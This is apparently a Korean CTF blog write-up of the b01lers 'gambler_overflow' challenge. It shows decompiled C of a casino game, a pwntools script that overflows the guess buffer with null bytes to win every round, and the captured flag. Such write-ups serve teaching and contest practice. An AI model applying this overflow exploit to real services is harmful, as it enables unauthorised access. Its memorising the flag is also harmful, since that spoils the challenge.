1. 문제
overflow 사용했습니다. 모두 null로 채웠습니다.
void casino(void)
{
int iVar1;
long in_FS_OFFSET;
int local_24;
char local_20 [8];
char local_18 [8];
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
puts("Welcome to the casino! A great prize awaits you when you hit 1000 coins ;)");
memset(local_20,0,8);
memset(local_18,0,8);
do {
if ((int)balance < 1) goto LAB_001016b3;
printf("Your current balance: %d\n",(ulong)balance);
local_24 = 0;
while (local_24 < 4) {
iVar1 = rand();
local_20[local_24] = (char)iVar1 + (char)(iVar1 / 0x1a) * -0x1a + 'a';
local_24 = local_24 + 1;
}
printf("Guess me a string of length 4 with lowercase letters: ");
fgets(local_18,5,stdin);
getchar();
printf("Your guess: %s\n",local_18);
printf("Correct word: %s\n",local_20);
iVar1 = strcmp(local_20,local_18);
if (iVar1 == 0) {
printf("You won (wow)! +%d coins.\n",(ulong)bet_win);
balance = bet_win + balance;
}
else {
printf("Bummer, you lost. -%d coins.\n",(ulong)bet_loss);
balance = balance - bet_loss;
}
if ((int)balance < 0) {
puts("You lost your entire balance! Better luck next time...");
goto LAB_001016b3;
}
} while ((int)balance < 1000);
give_flag();
LAB_001016b3:
puts("See you next time!");
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return;
}2. 풀이
# -*- coding: utf-8 -*-
# 1. pwntools 임포트
from pwn import *
# 2. 로그를 보기 위해 debug 모드 세팅
context.log_level = 'debug'
# 4. nc 이용해서 원격 접속
p = remote('ctf.b01lers.com', 9202)
# 5. 메시지 입력
for _ in range(100):
message = p.recvuntil("lowercase letters:")
print('message', message)
payload = "\x00" * 8
p.sendline(payload)
# # 9. 결과 확인
result = p.recvall()
print('result', result)3. flag
bctf{n0_pr4153_f0r_RNGesus}'CTF' 카테고리의 다른 글
| [EZCTF] Mario bros! (0) | 2022.06.06 |
|---|---|
| [b01lers CTF] gambler_overflow (0) | 2022.06.06 |
| [b01lers CTF] I Love Java (0) | 2022.06.06 |
| [NahamCon_CTF_2022] extravagant (0) | 2022.06.06 |
| [NahamCon_CTF_2022] personnel (0) | 2022.06.06 |
